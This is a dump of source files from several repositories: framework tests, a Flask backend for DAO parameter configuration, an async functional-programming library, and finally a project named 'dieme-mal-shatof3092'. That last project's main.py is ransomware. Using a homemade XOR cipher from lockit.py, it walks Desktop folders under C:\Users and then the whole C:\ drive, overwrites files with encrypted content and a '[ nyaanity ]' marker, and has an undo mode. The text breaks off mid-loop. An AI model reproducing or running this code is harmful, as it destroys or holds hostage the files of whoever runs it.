view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'value.is': 'null'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 4. success: .isnot null
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'value.isnot': 'null'})
await view.get()
assert view.ret_val['code'] == RETCODE.NOT_FOUND
# 5. success: .is value
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'name.is': 'Name1'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['binary'] == b'test1'
# 6. success: .isnot value
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'name.isnot': 'Name1'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['binary'] == b'test2'
async def test_delete():
assert ATestModel.select().where(ATestModel.name=='Name1B').count() == 0
b1 = ATestModel.create(name='Name1B', binary=b'test1B', count=1, json={'q': 1, 'w1b': 2})
# b2 = ATestModel.create(name='Name2B', binary=b'test2B', count=2, json={'q': 1, 'w2b': 2})
# b3 = ATestModel.create(name='Name3B', binary=b'test3B', count=3, json={'q': 1, 'w3b': 2})
assert ATestModel.select().where(ATestModel.name=='Name1B').count() == 1
view = await make_mocked_view_instance(app, ATestView, 'POST', '/api/test4', {'name': 'Name1B'})
await view.delete()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert ATestModel.select().where(ATestModel.name=='Name1B').count() == 0
async def test_select():
# 1. success
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
{'select': 'name,binary,count,active,flt,json,value'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'].keys() == {'name', 'binary', 'count', 'active', 'flt', 'json', 'value'}
# 2. success: list
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
{'select': 'name,binary,count,active,flt,json,value'})
await view.list()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 3. success: random spaces
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
{'select': 'name, binary,count,\n active,flt,\rjson,\t value'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
# 4. success: random spaces
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
{'select': 'name'})
await view.get()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'].keys() == {'name'}
# 5. failed: Column not found
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1', {'select': 'name1,binary'})
await view.get()
assert view.ret_val['code'] == RETCODE.FAILED
async def test_value_type():
# 1. success
view = await make_mocked_view_instance(app, ATestView, 'POST', '/api/test1',
post={'name': 'Name1BB', 'binary': b'test1bb',
'json': {'q': 1, 'w6': 2}, 'count': 4})
await view.new()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data'] == 1
val = ATestModel.get(ATestModel.binary == b'test1bb')
assert val.name == 'Name1BB'
# 2. failed: post, bad json
view = await make_mocked_view_instance(app, ATestView, 'POST', '/api/test1',
post={'name': 'Name2BB', 'binary': b'test2bb',
'json': '{', 'count': 5})
await view.new()
assert view.ret_val['code'] == RETCODE.INVALID_POSTDATA
# 2. failed: params, bad json
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
params={'json': '{', 'count': 5})
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
async def test_in():
# 1. invalid params: not a json string
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
params={'name.in': ['Name1', 'Name2', 'Name3']})
await view.get()
assert view.ret_val['code'] == RETCODE.INVALID_PARAMS
# 2. success
view = await make_mocked_view_instance(app, ATestView, 'GET', '/api/test1',
params={'name.in': json.dumps(['Name1', 'Name2', 'Name3'])})
await view.list()
assert view.ret_val['code'] == RETCODE.SUCCESS
assert view.ret_val['data']['info']['items_count'] == 3
class ATestReadyModel(ATestModel):
class Meta:
table_name = 'ready_test'
class ATestReadyModel2(ATestModel):
class Meta:
table_name = 'ready_test2'
@app.route('test1')
class ATestReadyView(PeeweeView):
model = ATestReadyModel
a = 1
@classmethod
def ready(cls):
cls.a = 2
@app.route('test1')
class ATestReadyView2(PeeweeView):
model = ATestReadyModel2
a = 1
@classmethod
async def ready(cls):
cls.a = 2
async def test_ready():
assert ATestReadyView.a == 2
assert ATestReadyView2.a == 2
app._prepare()
if __name__ == '__main__':
from slim.utils.async_run import sync_call
sync_call(test_bind)
sync_call(test_get)
sync_call(test_get_loadfk)
sync_call(test_new)
sync_call(test_update)
sync_call(test_is)
sync_call(test_delete)
sync_call(test_select)
sync_call(test_value_type)
sync_call(test_in)
sync_call(test_ready)
``` |
{
"source": "0xNuggan/commons-config-backend",
"score": 2
} |
#### File: 0xNuggan/commons-config-backend/main.py
```python
from flask import Flask, jsonify, request
from flask_restful import Resource, Api, reqparse
from flask_cors import CORS
import json
from dotenv import load_dotenv
from models.disputable_voting import DisputableVotingModel
from models.token_lockup import TokenLockupModel
from models.augmented_bonding_curve import BondingCurveHandler
from models.issue_generator import IssueGeneratorModel
from models.conviction_voting import ConvictionVotingModel
import models.import_params as import_params
app = Flask(__name__)
api = Api(app)
CORS(app)
load_dotenv()
class status(Resource):
def get(self):
try:
return {'data': 'Api running'}
except(error):
return {'data': error}
class TokenLockup(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('openingPrice', type=float)
parser.add_argument('tokenFreeze', type=float)
parser.add_argument('tokenThaw', type=float)
parameters = parser.parse_args()
opening_price = parameters['openingPrice']
token_freeze_period = parameters['tokenFreeze']
token_thaw_period = parameters['tokenThaw']
token_lockup_model = TokenLockupModel(opening_price=opening_price,
token_freeze_period=token_freeze_period,
token_thaw_period=token_thaw_period)
return jsonify(token_lockup_model.get_data())
class DisputableVoting(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('supportRequired', type=float)
parser.add_argument('minimumQuorum', type=float)
parser.add_argument('voteDuration', type=float)
parser.add_argument('delegatedVotingPeriod', type=float)
parser.add_argument('quietEndingPeriod', type=float)
parser.add_argument('quietEndingExtension', type=float)
parser.add_argument('executionDelay', type=float)
parameters = parser.parse_args()
support_required = parameters['supportRequired']
minimum_quorum = parameters['minimumQuorum']
vote_duration = parameters['voteDuration']
delegated_voting_period = parameters['delegatedVotingPeriod']
quiet_ending_period = parameters['quietEndingPeriod']
quiet_ending_extension = parameters['quietEndingExtension']
execution_delay = parameters['executionDelay']
disputable_voting_model = DisputableVotingModel(support_required=support_required,
minimum_quorum=minimum_quorum,
vote_duration=vote_duration,
delegated_voting_period=delegated_voting_period,
quiet_ending_period=quiet_ending_period,
quiet_ending_extension=quiet_ending_extension,
execution_delay=execution_delay)
return jsonify(disputable_voting_model.get_data())
class AugmentedBondingCurve(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('commonsTribute', type= str)
parser.add_argument('openingPrice', type=str)
parser.add_argument('entryTribute', type=str)
parser.add_argument('exitTribute', type=str)
parser.add_argument('ragequitAmount', type=str)
parser.add_argument('initialBuy', type=str)
parser.add_argument('reserveBalance', type=str)
parser.add_argument('stepList', action='append')
parser.add_argument('virtualSupply', type=str)
parser.add_argument('virtualBalance', type=str)
parser.add_argument('zoomGraph', type=str)
parameters = parser.parse_args()
commons_percentage = float(parameters['commonsTribute']) if parameters['commonsTribute'] is not None else 0.05
opening_price = float(parameters['openingPrice']) if parameters['openingPrice'] is not None else 1.50
entry_tribute = float(parameters['entryTribute']) if parameters['entryTribute'] is not None else 0.05
exit_tribute = float(parameters['exitTribute']) if parameters['exitTribute'] is not None else 0.05
ragequit_amount = float(parameters['ragequitAmount']) if parameters['ragequitAmount'] is not None else 0
initial_buy = float(parameters['initialBuy']) if parameters['initialBuy'] is not None else 0
scenario_reserve_balance = float(parameters['reserveBalance']) if parameters['reserveBalance'] is not None else (1571223.57 - initial_buy - ragequit_amount)*(1-commons_percentage)
steplist = parameters['stepList'] if parameters['stepList'] is not None else ""
virtual_supply = float(parameters['virtualSupply']) if parameters['virtualSupply'] is not None else -1
virtual_balance = float(parameters['virtualBalance']) if parameters['virtualBalance'] is not None else -1
zoom_graph = int(parameters['zoomGraph']) if parameters['zoomGraph'] is not None else 0
augmented_bonding_curve_model = BondingCurveHandler(
commons_percentage=commons_percentage,
ragequit_amount=ragequit_amount,
opening_price=opening_price,
entry_tribute=entry_tribute,
exit_tribute=exit_tribute,
initial_buy=initial_buy,
scenario_reserve_balance=scenario_reserve_balance,
virtual_supply= virtual_supply,
virtual_balance= virtual_balance,
steplist=steplist,
zoom_graph= zoom_graph )
return jsonify(augmented_bonding_curve_model.get_data())
class IssueGenerator(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('title', type=str)
parser.add_argument('overallStrategy', type=str)
parser.add_argument('tokenLockup', type=dict)
parser.add_argument('augmentedBondingCurve', type=dict)
parser.add_argument('taoVoting', type=dict)
parser.add_argument('convictionVoting', type=dict)
parser.add_argument('advancedSettings', type=dict)
parameters = json.loads(request.form.get('body'))
image_files = request.files
title = parameters['title']
overall_strategy = parameters['overallStrategy']
token_lockup = parameters['tokenLockup']
abc = parameters['augmentedBondingCurve']
tao_voting = parameters['taoVoting']
conviction_voting = parameters['convictionVoting']
advanced_settings = parameters['advancedSettings']
abc['commonsTribute'] = float(abc['commonsTribute']) if abc['commonsTribute'] is not None else 0.05
abc['openingPrice'] = float(abc['openingPrice']) if abc['openingPrice'] is not None else 1.50
abc['entryTribute'] = float(abc['entryTribute']) if abc['entryTribute'] is not None else 0.05
abc['exitTribute'] = float(abc['exitTribute']) if abc['exitTribute'] is not None else 0.05
abc['ragequitAmount'] = float(abc['ragequitAmount']) if abc['ragequitAmount'] is not None else 0
abc['initialBuy'] = float(abc['initialBuy']) if abc['initialBuy'] is not None else 0
abc['reserveBalance'] = float(abc['reserveBalance']) if abc['reserveBalance'] is not None else (1571223.57 - abc.initial_buy - abc.ragequit_amount)*(1-abc.commons_percentage)
abc['stepList'] = abc['stepList'] if abc['stepList'] is not abc else ""
abc['virtualSupply'] = float(abc['virtualSupply']) if abc['virtualSupply'] is not None else -1
abc['virtualBalance'] = float(abc['virtualBalance']) if abc['virtualBalance'] is not None else -1
abc['zoomGraph'] = int(abc['zoomGraph']) if abc['zoomGraph'] is not None else 0
issue_generator = IssueGeneratorModel(
raw_body=parameters,
title=title,
token_lockup=token_lockup,
abc=abc,
tao_voting=tao_voting,
conviction_voting=conviction_voting,
advanced_settings=advanced_settings,
overall_strategy=overall_strategy,
image_files=image_files
)
return jsonify(issue_generator.generate_output())
class ConvictionVoting(Resource):
def post(self):
parser = reqparse.RequestParser()
parser.add_argument('spendingLimit', type=float)
parser.add_argument('minimumConviction', type=float)
parser.add_argument('convictionGrowth', type=int)
parser.add_argument('convictionVotingPeriodDays', type=int)
parameters = parser.parse_args()
spending_limit = parameters['spendingLimit']
minimum_conviction = parameters['minimumConviction']
conviction_growth = parameters['convictionGrowth']
voting_period_days = parameters['convictionVotingPeriodDays']
conviction_voting_model = ConvictionVotingModel(
spending_limit=spending_limit,
minimum_conviction=minimum_conviction,
conviction_growth=conviction_growth,
voting_period_days=voting_period_days
)
return jsonify(conviction_voting_model.get_data())
class ImportParams(Resource):
def get(self):
parser = reqparse.RequestParser()
parser.add_argument('issueNumber', type=int)
parameters = parser.parse_args()
issue_number = parameters.get('issueNumber', '')
return jsonify(import_params.get_data(issue_number))
api.add_resource(status, '/')
api.add_resource(ImportParams, '/import-parameters/')
api.add_resource(TokenLockup, '/token-lockup/')
api.add_resource(DisputableVoting, '/disputable-voting/')
api.add_resource(AugmentedBondingCurve, '/augmented-bonding-curve/')
api.add_resource(IssueGenerator, '/issue-generator/')
api.add_resource(ConvictionVoting, '/conviction-voting/')
if __name__ == '__main__':
app.run(debug=True)
```
#### File: commons-config-backend/models/issue_generator.py
```python
import pandas as pd
import requests
import json
import os
import base64
from base64 import b64encode
from dotenv import load_dotenv
from pymongo import MongoClient
from models.data.issue_submission_data import issue_data, advanced_settings_data
from models.token_lockup import TokenLockupModel
from models.conviction_voting import ConvictionVotingModel
from models.augmented_bonding_curve import BondingCurveHandler
load_dotenv()
class IssueGeneratorModel:
def __init__(self,
raw_body={},
title=None,
token_lockup=None,
abc=None,
tao_voting=None,
conviction_voting=None,
advanced_settings=None,
overall_strategy=None,
image_files=None):
self.raw_body = raw_body
self.issue_number = 0
self.title = title if title is not None else "TEC Config Dashboard Proposal test"
self.overall_strategy = overall_strategy if overall_strategy is not None else ""
self.token_lockup = token_lockup if token_lockup is not None else {
"openingPrice": 5,
"tokenFreeze": 20,
"tokenThaw": 15,
"strategy": ""
}
self.abc = abc if abc is not None else {
"commonsTribute": 0.25,
"ragequitAmount": 60,
"initialBuy": 200,
"openingPrice":1.65,
"reserveBalance": 1571.22357,
"entryTribute": 0.05,
"exitTribute": 0.15,
"hatchScenarioFunding": 1571.22357,
"stepList": [[5000, "wxDai"], [100000, "wxDai"], [3000, "TEC"]],
"zoomGraph": 0,
"strategy": ""
}
self.tao_voting = tao_voting if tao_voting is not None else {
"supportRequired": 40,
"minimumQuorum": 10,
"voteDuration": 7,
"delegatedVotingPeriod": 3,
"quietEndingPeriod": 2,
"quietEndingExtension": 1,
"executionDelay": 1,
"strategy": ""
}
self.conviction_voting = conviction_voting if conviction_voting is not None else {
"convictionGrowth": 2,
"minimumConviction": 0.01,
"votingPeriodDays": 7,
"spendingLimit": 0.2,
"strategy": ""
}
self.advanced_settings = advanced_settings
self.image_files = image_files
def format_output_issue(self):
token_lockup_model = TokenLockupModel(
opening_price=self.token_lockup.get("openingPrice", ""),
token_freeze_period=self.token_lockup.get("tokenFreeze", ""),
token_thaw_period=self.token_lockup.get("tokenThaw", ""),
)
token_lockup_output = token_lockup_model.get_data().get("output", "")
token_lockup_table = token_lockup_output.get("table", "")
commons_percentage = self.abc.get("commonsTribute", 0.05)
opening_price = self.abc.get("openingPrice", 3)
entry_tribute = self.abc.get("entryTribute", 0.05)
exit_tribute = self.abc.get("entryTribute", 0.05)
scenario_reserve_balance = self.abc.get("reserveBalance", 1571.22357)
steplist = self.abc.get("stepList", "")
zoom_graph = self.abc.get("zoomGraph", 0)
initial_buy = self.abc.get("initialBuy", 0)
ragequit_amount = self.abc.get("ragequitAmount", 100)
augmented_bonding_curve_model = BondingCurveHandler(
commons_percentage=commons_percentage,
ragequit_amount=ragequit_amount,
opening_price=opening_price,
entry_tribute=entry_tribute,
exit_tribute=exit_tribute,
scenario_reserve_balance=scenario_reserve_balance,
initial_buy=initial_buy,
steplist=steplist,
zoom_graph=zoom_graph)
augmented_bonding_curve_output = augmented_bonding_curve_model.get_data()
conviction_voting_model = ConvictionVotingModel(
conviction_growth=self.conviction_voting.get("convictionGrowth", ""),
minimum_conviction=self.conviction_voting.get("minimumConviction", ""),
voting_period_days=self.conviction_voting.get("votingPeriodDays", ""),
spending_limit=self.conviction_voting.get("spendingLimit", ""),
)
conviction_voting_output = conviction_voting_model.get_data().get("output", "")
conviction_voting_table = conviction_voting_output.get("table", "")
formated_abc_steps = ""
abc_step_table = augmented_bonding_curve_output["stepTable"]
for idx in range(len(abc_step_table['step'])):
if idx > 0:
formated_abc_steps += "| **Step {step}** | {current_price} | {amount_in} | {tribute_collected} | {amount_out} | {new_price} | {price_slippage} |\n".format(
step=abc_step_table["step"][idx],
current_price=abc_step_table["currentPriceParsed"][idx],
amount_in=abc_step_table["amountInParsed"][idx],
tribute_collected=abc_step_table["tributeCollectedParsed"][idx],
amount_out=abc_step_table["amountOutParsed"][idx],
new_price=abc_step_table["newPriceParsed"][idx],
price_slippage=abc_step_table["slippage"][idx]
)
formated_advanced_settings_data = advanced_settings_data.format(
issue_number=self.issue_number,
commons_pool_amount=self.advanced_settings.get("commonPoolAmount", ""),
hny_liquidity=self.advanced_settings.get("HNYLiquidity", ""),
garden_liquidity=self.advanced_settings.get("gardenLiquidity", ""),
virtual_supply=self.advanced_settings.get("virtualSupply", ""),
virtual_balance="{:,}".format(self.advanced_settings.get("virtualBalance", "")),
transferability=self.advanced_settings.get("transferability", ""),
token_name=self.advanced_settings.get("tokenName", ""),
token_symbol=self.advanced_settings.get("tokenSymbol", ""),
proposal_deposit=self.advanced_settings.get("proposalDeposit", ""),
challenge_deposit=self.advanced_settings.get("challengeDeposit", ""),
settlement_period=self.advanced_settings.get("settlementPeriod", ""),
minimum_effective_supply=100 * self.advanced_settings.get("minimumEffectiveSupply", ""),
hatchers_rage_quit=self.advanced_settings.get("ragequitAmount", ""),
initial_buy=self.advanced_settings.get("initialBuy", ""),
)
formated_output = issue_data.format(
issue_number=self.issue_number,
overall_strategy=self.overall_strategy,
token_lockup_strategy=self.token_lockup.get("strategy", ""),
token_freeze_period=self.token_lockup.get("tokenFreeze", ""),
token_thaw_period=self.token_lockup.get("tokenThaw", ""),
opening_price=self.token_lockup.get("openingPrice", ""),
tokens_released=["{0:.2f}".format(100 * item) for item in token_lockup_table["tokensReleased"]],
price_floor=["{0:.2f}".format(item) for item in token_lockup_table["price"]],
abc_strategy=self.abc.get("strategy", ""),
commons_tribute="{0:.2f}".format(100 * self.abc.get("commonsTribute", "")),
commons_tribute_remainder="{0:.2f}".format(100 - 100 * self.abc.get("commonsTribute", "")),
entry_tribute="{0:.2f}".format(100 * self.abc.get("entryTribute", "")),
exit_tribute="{0:.2f}".format(100 * self.abc.get("exitTribute", "")),
reserve_ratio="{0:.2f}".format(100 * augmented_bonding_curve_output["chartData"]["reserveRatio"]),
step=augmented_bonding_curve_output["stepTable"]["step"],
current_price=augmented_bonding_curve_output["stepTable"]["currentPriceParsed"],
amount_in=augmented_bonding_curve_output["stepTable"]["amountInParsed"],
tribute_collected=augmented_bonding_curve_output["stepTable"]["tributeCollectedParsed"],
amount_out=augmented_bonding_curve_output["stepTable"]["amountOutParsed"],
new_price=augmented_bonding_curve_output["stepTable"]["newPriceParsed"],
price_slippage=augmented_bonding_curve_output["stepTable"]["slippage"],
common_pool_before="{0:.2f}".format(augmented_bonding_curve_output["fundAllocations"]["commonPoolBefore"]),
reserve_balance_before="{0:.2f}".format(augmented_bonding_curve_output["fundAllocations"]["reserveBalanceBefore"]),
common_pool_after="{0:.2f}".format(augmented_bonding_curve_output["fundAllocations"]["commonPoolAfter"]),
reserve_balance_after="{0:.2f}".format(augmented_bonding_curve_output["fundAllocations"]["reserveBalanceAfter"]),
abc_steps=formated_abc_steps,
abc_reserve=augmented_bonding_curve_output["milestoneTable"].get("balance", ""),
abc_supply=augmented_bonding_curve_output["milestoneTable"].get("supply", ""),
abc_price=augmented_bonding_curve_output["milestoneTable"].get("price", ""),
tao_voting_strategy=self.tao_voting.get("strategy", ""),
support_required=self.tao_voting.get("supportRequired", ""),
minimum_quorum=self.tao_voting.get("minimumQuorum", ""),
double_conviction_growth_days=2*self.tao_voting.get("voteDuration", ""),
vote_duration_days=self.tao_voting.get("voteDuration", ""),
delegated_voting_days=self.tao_voting.get("delegatedVotingPeriod", ""),
quiet_ending_days=self.tao_voting.get("quietEndingPeriod", ""),
quiet_ending_extension_days=self.tao_voting.get("quietEndingExtension", ""),
execution_delay_days=self.tao_voting.get("executionDelay", ""),
vote_duration_days_1_extension=self.tao_voting.get("voteDuration", "") + self.tao_voting.get("quietEndingExtension", ""),
vote_duration_days_2_extensions=self.tao_voting.get("voteDuration", "") + (2 * self.tao_voting.get("quietEndingExtension", "")),
review_duration_days=self.tao_voting.get("voteDuration", "") - self.tao_voting.get("delegatedVotingPeriod", ""),
review_duration_days_1_extension=self.tao_voting.get("voteDuration", "") - self.tao_voting.get("delegatedVotingPeriod", "") + self.tao_voting.get("quietEndingExtension", ""),
review_duration_days_2_extensions=self.tao_voting.get("voteDuration", "") - self.tao_voting.get("delegatedVotingPeriod", "") + (2 * self.tao_voting.get("quietEndingExtension", "")),
execute_proposal_duration_days=self.tao_voting.get("voteDuration", "") + self.tao_voting.get("executionDelay", ""),
execute_proposal_duration_days_1_extension=self.tao_voting.get("voteDuration", "") + self.tao_voting.get("executionDelay", "") + self.tao_voting.get("quietEndingExtension", ""),
execute_proposal_duration_days_2_extensions=self.tao_voting.get("voteDuration", "") + self.tao_voting.get("executionDelay", "") + (2 * self.tao_voting.get("quietEndingExtension", "")),
conviction_voting_strategy=self.conviction_voting.get("strategy", ""),
conviction_growth_days=self.conviction_voting.get("convictionGrowth", ""),
minimum_conviction=100 * self.conviction_voting.get("minimumConviction", ""),
relative_spending_limit=100 * self.conviction_voting.get("spendingLimit", ""),
effective_supply=conviction_voting_table["totalEffectiveSupply"],
requested_amount=conviction_voting_table["requestedAmount"],
amount_common_pool=conviction_voting_table["amountInCommonPool"],
min_tokens_pass=conviction_voting_table["minTokensToPass"],
tokens_pass_2_weeks=conviction_voting_table["tokensToPassIn2Weeks"],
has_advanced_settings="Yes" if self.advanced_settings else "No",
advanced_settings_section=formated_advanced_settings_data if self.advanced_settings else "",
token_lockup_image=self.save_images_database(self.image_files['tokenLockup']),
abc_image=self.save_images_database(self.image_files['abc']),
tao_voting_image=self.save_images_database(self.image_files['taoVoting']),
conviction_voting_image=self.save_images_database(self.image_files['convictionVoting'])
)
return formated_output
def save_parameters_database(self, issue_number):
MONGODB_CLIENT = os.getenv("MONGODB_CLIENT")
client = MongoClient(MONGODB_CLIENT)
db = client.get_database("test_tec_params_db")
test_params_db = db.test_params
self.raw_body["issue_number"] = issue_number
issue_data = self.raw_body
test_params_db.insert_one(issue_data)
def save_images_database(self, image=None, default=None):
CLIENT_ID = os.getenv("CLIENT_ID")
API_KEY = os.getenv("API_KEY")
url = "https://api.imgur.com/3/upload.json"
headers = {"Authorization": CLIENT_ID}
r = requests.post(
url,
headers = headers,
data = {
'key': API_KEY,
'image': b64encode(image.read()),
'type': 'base64',
'name': image,
'title': 'Picture'
}
)
return r.json()['data'].get('link', '')
def generate_output(self):
PARAMS_BOT_AUTH_TOKEN = os.getenv("PARAMS_BOT_AUTH_TOKEN")
headers = {'Content-Type': 'application/json', 'Authorization': PARAMS_BOT_AUTH_TOKEN}
r_issue_data = requests.get('https://api.github.com/search/issues?q=repo:CommonsBuild/test-issues-config-dashboard')
self.issue_number = 1 + r_issue_data.json().get("total_count", "")
data = {"title": self.title, "body": self.format_output_issue()}
r = requests.post('https://api.github.com/repos/CommonsBuild/test-issues-config-dashboard/issues', data=json.dumps(data), headers=headers)
if r.status_code == 201:
issue_number = r.json().get("number", "")
self.save_parameters_database(issue_number=issue_number)
return {"status": r.status_code, "url": r.json().get("html_url", "")}
``` |
{
"source": "0xnurl/gamla",
"score": 2
} |
#### File: gamla/gamla/data.py
```python
import dataclasses
import json
import dataclasses_json
def get_encode_config():
return dataclasses.field(
metadata=dataclasses_json.config(
encoder=lambda lst: sorted(lst, key=json.dumps, reverse=False)
)
)
```
#### File: gamla/gamla/functional_async.py
```python
import asyncio
import inspect
from typing import Any, AsyncGenerator, Awaitable, Callable, Dict, Iterable
import toolz
from toolz import curried
from gamla import functional
async def to_awaitable(value):
if inspect.isawaitable(value):
return await value
return value
async def apipe(val, *funcs):
for f in funcs:
val = await to_awaitable(f(val))
return val
def acompose(*funcs):
async def composed(*args, **kwargs):
for f in reversed(funcs):
args = [await to_awaitable(f(*args, **kwargs))]
kwargs = {}
return toolz.first(args)
return composed
def acompose_left(*funcs):
return acompose(*reversed(funcs))
def run_sync(f):
"""Runs a coroutine in a synchronous context, blocking until result arrives."""
loop = asyncio.new_event_loop()
return loop.run_until_complete(asyncio.ensure_future(f, loop=loop))
@toolz.curry
async def amap(f, it):
return await asyncio.gather(*map(f, it))
@toolz.curry
async def amap_ascompleted(
f: Callable[[Any], Awaitable[Any]], it: Iterable
) -> AsyncGenerator[Any, None]:
for future in asyncio.as_completed(map(f, it)):
yield await future
@toolz.curry
async def aexcepts(exception_type, func, handler, x):
try:
return await func(x)
except exception_type as error:
return handler(error)
@toolz.curry
async def mapa(f, it):
async for element in it:
yield f(element)
async def aconcat(async_generators):
async for g in async_generators:
for x in g:
yield x
def ajuxt(*funcs):
async def ajuxt_inner(x):
return await apipe(
funcs, amap(acompose_left(functional.apply(x), to_awaitable)), tuple
)
return ajuxt_inner
@toolz.curry
async def afilter(func, it):
it = tuple(it)
results = await amap(func, it)
return toolz.pipe(
zip(it, results), curried.filter(toolz.second), curried.map(toolz.first)
)
def afirst(*funcs, exception_type):
async def afirst_inner(x):
for f in funcs:
try:
return await to_awaitable(f(x))
except exception_type:
pass
raise exception_type
return afirst_inner
@toolz.curry
async def apair_with(f, element):
return await f(element), element
@toolz.curry
async def apair_right(f, element):
return element, await f(element)
@toolz.curry
async def akeymap(f, d: Dict):
return await aitemmap(ajuxt(acompose_left(toolz.first, f), toolz.second), d)
@toolz.curry
async def avalmap(f, d: Dict):
return await aitemmap(ajuxt(toolz.first, acompose_left(toolz.second, f)), d)
@toolz.curry
async def aitemmap(f, d: Dict):
return await apipe(d, dict.items, amap(f), dict)
@toolz.curry
def aternary(condition, f_true, f_false):
async def aternary_inner(*args, **kwargs):
return (
await to_awaitable(f_true(*args, **kwargs))
if await to_awaitable(condition(*args, **kwargs))
else await to_awaitable(f_false(*args, **kwargs))
)
return aternary_inner
``` |
{
"source": "0xnya/dieme-mal-shatof3092",
"score": 3
} |
#### File: 0xnya/dieme-mal-shatof3092/lockit.py
```python
from binascii import hexlify, unhexlify
class HEX:
def __init__(self, text: str, secret: str):
self.secret = secret
self.text = text
self.data = None
@staticmethod
def rawEncrypt(text: str, secret: str) -> "HEX":
byted_text = text.encode("utf-8")
byted_secret = secret.encode("utf-8")
hexlified_text = hexlify(byted_text)
hexlified_secret = hexlify(byted_secret)
inted_text = int(hexlified_text, 16)
inted_secret = int(hexlified_secret, 16)
encrypted_int = inted_text ^ inted_secret // 0xC0FFEE
data = hex(encrypted_int).upper().replace("0X", "0x")
return data
@staticmethod
def rawDecrypt(data: str, secret: str) -> str:
byted_secret = secret.encode("utf-8")
hexlified_secret = hexlify(byted_secret)
inted_secret = int(hexlified_secret, 16)
encrypted_int = int(data[2:], 16)
decrypted_int = encrypted_int ^ inted_secret // 0xC0FFEE
decrypted_text = unhexlify(f"{decrypted_int:x}")
data = decrypted_text.decode("utf-8")
return data
def encrypt(self) -> "HEX":
byted_text = self.text.encode("utf-8")
byted_secret = self.secret.encode("utf-8")
hexlified_text = hexlify(byted_text)
hexlified_secret = hexlify(byted_secret)
inted_text = int(hexlified_text, 16)
inted_secret = int(hexlified_secret, 16)
encrypted_int = inted_text ^ inted_secret // 0xC0FFEE
self.data = hex(encrypted_int).upper().replace("0X", "0x")
return self
def decrypt(self) -> "HEX":
byted_secret = self.secret.encode("utf-8")
hexlified_secret = hexlify(byted_secret)
inted_secret = int(hexlified_secret, 16)
encrypted_int = int(self.data[2:], 16)
decrypted_int = encrypted_int ^ inted_secret // 0xC0FFEE
decrypted_text = unhexlify(f"{decrypted_int:x}")
self.data = decrypted_text.decode("utf-8")
return self
class ID:
def __init__(self, text: str, secret: str):
self.secret = secret
self.text = text
self.data = None
@staticmethod
def rawEncrypt(text: str, secret: str) -> str:
byted_text = text.encode("utf-8")
byted_secret = secret.encode("utf-8")
hexlified_text = hexlify(byted_text)
hexlified_secret = hexlify(byted_secret)
inted_text = int(hexlified_text, 16)
inted_secret = int(hexlified_secret, 16)
encrypted_int = inted_text ^ inted_secret // 0xC0FFEE
data = encrypted_int
return data
@staticmethod
def rawDecrypt(data: str, secret: str) -> str:
byted_secret = secret.encode("utf-8")
hexlified_secret = hexlify(byted_secret)
inted_secret = int(hexlified_secret, 16)
encrypted_int = int(data)
decrypted_int = encrypted_int ^ inted_secret // 0xC0FFEE
decrypted_text = unhexlify(f"{decrypted_int:x}")
data = decrypted_text.decode("utf-8")
return data
def encrypt(self) -> "ID":
byted_text = self.text.encode("utf-8")
byted_secret = self.secret.encode("utf-8")
hexlified_text = hexlify(byted_text)
hexlified_secret = hexlify(byted_secret)
inted_text = int(hexlified_text, 16)
inted_secret = int(hexlified_secret, 16)
encrypted_int = inted_text ^ inted_secret // 0xC0FFEE
self.data = encrypted_int
return self
def decrypt(self) -> "ID":
byted_secret = self.secret.encode("utf-8")
hexlified_secret = hexlify(byted_secret)
inted_secret = int(hexlified_secret, 16)
encrypted_int = int(self.data)
decrypted_int = encrypted_int ^ inted_secret // 0xC0FFEE
decrypted_text = unhexlify(f"{decrypted_int:x}")
self.data = decrypted_text.decode("utf-8")
return self
```
#### File: 0xnya/dieme-mal-shatof3092/main.py
```python
from os import walk
from lockit import HEX
from threading import Thread
import codecs
MODE = "DEATH" # DEATH/UNDO
KEY = "<KEY>" # encryption/decryption key
MESSAGE = "[ nyaanity ] " # at top of every encrypted file
class Dieme(Thread):
def __init__(self):
super().__init__()
self.step = 0
def run(self):
# top priority: important files
for obj in walk(f"C:\\Users"):
self.step += 1
path = obj[0]
if "desktop" in path.lower():
for file in obj[2]:
path = f"{obj[0]}\\{file}"
try:
with codecs.open(path, "r", "utf8") as f:
data = f.read()
if MODE == "DEATH":
with codecs.open(path, "w", "utf8") as f:
encrypted = (
HEX(
data,
KEY,
)
.encrypt()
.data
)
f.write(MESSAGE + encrypted)
if self.step % 1000 == 0:
print(f"\n\n({self.step}) {MODE} {path}\n\n")
elif MODE == "UNDO":
if MESSAGE in data:
with codecs.open(path, "w", "utf8") as f:
decrypted = (
HEX(
data.replace(MESSAGE, ""),
KEY,
)
.decrypt()
.data
)
f.write(decrypted)
print(f"\n\n({self.step}) {MODE} {path}\n\n")
except:
print(f"({self.step}) err no access to {file}")
# the rest
for obj in walk("C:\\"):
self.step += 1
for file in obj[2]:
path = f"{obj[0]}\\{file}"
try:
with codecs.open(path, "r", "utf8") as f:
data = f.read()
if MODE == "DEATH":
with codecs.open(path, "w", "utf8") as f:
